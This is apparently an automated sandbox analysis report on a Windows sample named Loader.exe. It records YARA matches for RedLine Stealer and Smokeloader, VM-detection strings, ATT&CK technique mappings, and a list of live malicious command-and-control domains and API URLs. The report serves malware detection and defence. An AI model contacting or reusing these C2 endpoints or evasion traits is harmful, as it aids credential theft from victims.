      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068D0F80_3_0068D0F8
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068CF9E0_3_0068CF9E
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068CF9E0_3_0068CF9E
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068CE710_3_0068CE71
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068CE710_3_0068CE71
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068D2540_3_0068D254
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068D2540_3_0068D254
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068CC280_3_0068CC28
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068CC280_3_0068CC28
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068D4240_3_0068D424
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068D4240_3_0068D424
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068D33C0_3_0068D33C
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068D33C0_3_0068D33C
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068D0F80_3_0068D0F8
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068D0F80_3_0068D0F8
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068CF9E0_3_0068CF9E
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068CF9E0_3_0068CF9E
      Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1568
      Source: Loader.exe, 00000000.00000000.1719811158.0000000000462000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesOdilemio> vs Loader.exe
      Source: Loader.exeBinary or memory string: OriginalFilenamesOdilemio> vs Loader.exe
      Source: Loader.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.2140034005.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.2140310460.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@10/3
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4308
      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\2b9925b9-3803-46dc-82f9-c273a8332338Jump to behavior
      Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Loader.exeReversingLabs: Detection: 68%
      Source: C:\Users\user\Desktop\Loader.exeFile read: C:\Users\user\Desktop\Loader.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
      Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1568
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\Loader.exeUnpacked PE file: 0.2.Loader.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
      Source: C:\Users\user\Desktop\Loader.exeUnpacked PE file: 0.2.Loader.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_006762FC push 0000007Bh; retf 0_3_006764D3
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_006762FC push 0000007Bh; retf 0_3_006764D3
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_006762FC push 0000007Bh; retf 0_3_006764D3
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_006762FC push 0000007Bh; retf 0_3_006764D3
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_00691D63 push ebp; retf 0_3_00691D65
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_00691D63 push ebp; retf 0_3_00691D65
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068CE71 push eax; iretd 0_3_0068D695
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068CE71 push eax; iretd 0_3_0068D695
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_00692576 push ebx; ret 0_3_00692577
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_00692576 push ebx; ret 0_3_00692577
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_00691C50 push esi; ret 0_3_00691C59
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_00691C50 push esi; ret 0_3_00691C59
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068C354 push eax; ret 0_3_0068C355
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068C354 push eax; ret 0_3_0068C355
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0069190A push edx; ret 0_3_00691924
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0069190A push edx; ret 0_3_00691924
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_00691BFB push ebx; iretd 0_3_00691C03
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_00691BFB push ebx; iretd 0_3_00691C03
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068A6F4 push ss; retf 0_3_0068A6F5
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068A6F4 push ss; retf 0_3_0068A6F5
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068C9C8 push eax; iretd 0_3_0068C9E1
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068C9C8 push eax; iretd 0_3_0068C9E1
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_00691CC9 push ss; ret 0_3_00691CD1
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_00691CC9 push ss; ret 0_3_00691CD1
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068EDD4 pushad ; retn 0068h0_3_0068EDD5
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068EDD4 pushad ; retn 0068h0_3_0068EDD5
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068CF9C pushfd ; iretd 0_3_0068CF9D
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068CF9C pushfd ; iretd 0_3_0068CF9D
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068D696 push eax; iretd 0_3_0068D695
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068D696 push eax; iretd 0_3_0068D695
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_00691D63 push ebp; retf 0_3_00691D65
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Loader.exe TID: 6676Thread sleep time: -150000s >= -30000sJump to behavior
      Source: Amcache.hve.3.drBinary or memory string: VMware
      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
      Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: Loader.exe, Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775164828.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775235067.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.3.drBinary or memory string: vmci.sys
      Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
      Source: Loader.exe, 00000000.00000002.2140057200.000000000062E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%i%SystemRoot%\system32\mswsock.dll
      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.3.drBinary or memory string: VMware20,1
      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Loader.exe, 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: debonairnukk.xyz
      Source: Loader.exe, 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: diffuculttan.xyz
      Source: Loader.exe, 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: effecterectz.xyz
      Source: Loader.exe, 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: deafeninggeh.biz
      Source: Loader.exe, 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: immureprech.biz
      Source: C:\Users\user\Desktop\Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      PowerShell
      1
      DLL Side-Loading
      1
      Process Injection
      1
      Virtualization/Sandbox Evasion
      OS Credential Dumping11
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      1
      Process Injection
      LSASS Memory1
      Virtualization/Sandbox Evasion
      Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Deobfuscate/Decode Files or Information
      Security Account Manager2
      System Information Discovery
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture114
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Software Packing
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      Loader.exe68%ReversingLabsWin32.Trojan.StealC
      Loader.exe100%AviraHEUR/AGEN.1306956
      Loader.exe100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://s.ytimg.com;0%Avira URL Cloudsafe
      https://wrathful-jammy.cyou/api100%Avira URL Cloudmalware
      https://diffuculttan.xyz/api100%Avira URL Cloudmalware
      https://www.gstatic.cn/recaptcha/0%Avira URL Cloudsafe
      https://deafeninggeh.biz/100%Avira URL Cloudmalware
      https://awake-weaves.cyou/api#)100%Avira URL Cloudmalware
      https://immureprech.biz/100%Avira URL Cloudmalware
      https://immureprech.biz/pi100%Avira URL Cloudmalware
      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%Avira URL Cloudsafe
      http://www.valvesoftware.com/legal.htm0%Avira URL Cloudsafe
      https://wrathful-jammy.cyou/100%Avira URL Cloudmalware
      brendon-sharjen.biz100%Avira URL Cloudmalware
      https://lv.queniujq.cn0%Avira URL Cloudsafe
      https://deafeninggeh.biz:443/api100%Avira URL Cloudmalware
      https://immureprech.biz/api100%Avira URL Cloudmalware
      https://immureprech.biz/api;100%Avira URL Cloudmalware
      https://wrathful-jammy.cyou/api=(#100%Avira URL Cloudmalware
      https://broadcast.st.dl.eccdnx.com0%Avira URL Cloudsafe
      https://immureprech.biz/apij100%Avira URL Cloudmalware
      https://wrathful-jammy.cyou/api6(8100%Avira URL Cloudmalware
      https://immureprech.biz/l#100%Avira URL Cloudmalware
      https://effecterectz.xyz/100%Avira URL Cloudmalware
      https://wrathful-jammy.cyou/apio100%Avira URL Cloudmalware
      NameIPActiveMaliciousAntivirus DetectionReputation
      steamcommunity.com
      23.55.153.106
      truefalse
        high
        immureprech.biz
        104.21.22.222
        truefalse
          high
          deafeninggeh.biz
          104.21.32.1
          truetrue
            unknown
            brendon-sharjen.biz
            104.21.32.1
            truetrue
              unknown
              sordid-snaked.cyou
              unknown
              unknowntrue
                unknown
                diffuculttan.xyz
                unknown
                unknowntrue
                  unknown
                  effecterectz.xyz
                  unknown
                  unknowntrue
                    unknown
                    awake-weaves.cyou
                    unknown
                    unknowntrue
                      unknown
                      wrathful-jammy.cyou
                      unknown
                      unknowntrue
                        unknown
                        debonairnukk.xyz
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          sordid-snaked.cyoufalse
                            high
                            deafeninggeh.bizfalse
                              high
                              effecterectz.xyzfalse
                                high
                                wrathful-jammy.cyoufalse
                                  high
                                  https://steamcommunity.com/profiles/76561199724331900false
                                    high
                                    awake-weaves.cyoufalse
                                      high
                                      immureprech.bizfalse
                                        high
                                        https://immureprech.biz/apitrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        debonairnukk.xyzfalse
                                          high
                                          brendon-sharjen.biztrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          diffuculttan.xyzfalse
                                            high
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngLoader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://player.vimeo.comLoader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://immureprech.biz/Loader.exe, Loader.exe, 00000000.00000003.1775134722.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1752403275.0000000000699000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775164828.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775235067.0000000000671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://steamcommunity.com/?subsection=broadcastsLoader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://immureprech.biz/piLoader.exe, 00000000.00000003.1752403275.0000000000699000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://store.steampowered.com/subscriber_agreement/Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.gstatic.cn/recaptcha/Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
